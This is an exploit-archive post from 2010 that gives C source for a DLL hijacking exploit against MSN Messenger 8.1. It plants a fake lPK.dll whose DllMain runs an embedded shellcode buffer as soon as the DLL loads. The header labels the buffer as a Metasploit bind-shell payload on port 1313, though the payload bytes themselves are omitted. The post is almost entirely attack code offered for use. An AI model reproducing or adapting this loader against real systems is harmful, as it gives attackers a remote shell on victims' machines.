[local exploits] - MSN Messenger 8.1 DLL Hijacking Exploit (
Posted on 10 October 2010
<pre>
=================================================
MSN Messenger 8.1 DLL Hijacking Exploit (lPK.dll)
=================================================

/*
Exploit Title: MSN Messenger 8.1 DLL Hijacking Exploit (lPK.dll)
Date: October 7, 2010
Author: Mu$lim redouan@live.ma
Version: 8.1
Tested on: Windows XP SP3 fr
File Vulnerable:
 - msnmsgr.exe
 - livecall.exe
*/

#include <windows.h>

#define DllExport __declspec (dllexport)

/*
 * windows/shell_bind_tcp - 476 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * LPORT=1313, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
 * AutoRunScript=
 */
unsigned char buf[] = ""; /* 476-byte encoded payload not reproduced */

BOOL WINAPI DllMain (
    HANDLE hinstDLL,
    DWORD fdwReason,
    LPVOID lpvReserved)
{
    /* Called by the loader when the DLL is mapped into the process;
       treats buf as code and calls into it. */
    int (*func)();
    func = (int (*)()) buf;
    (int)(*func)();
    return 0;
}

# Inj3ct0r.com [2010-10-10]
</pre>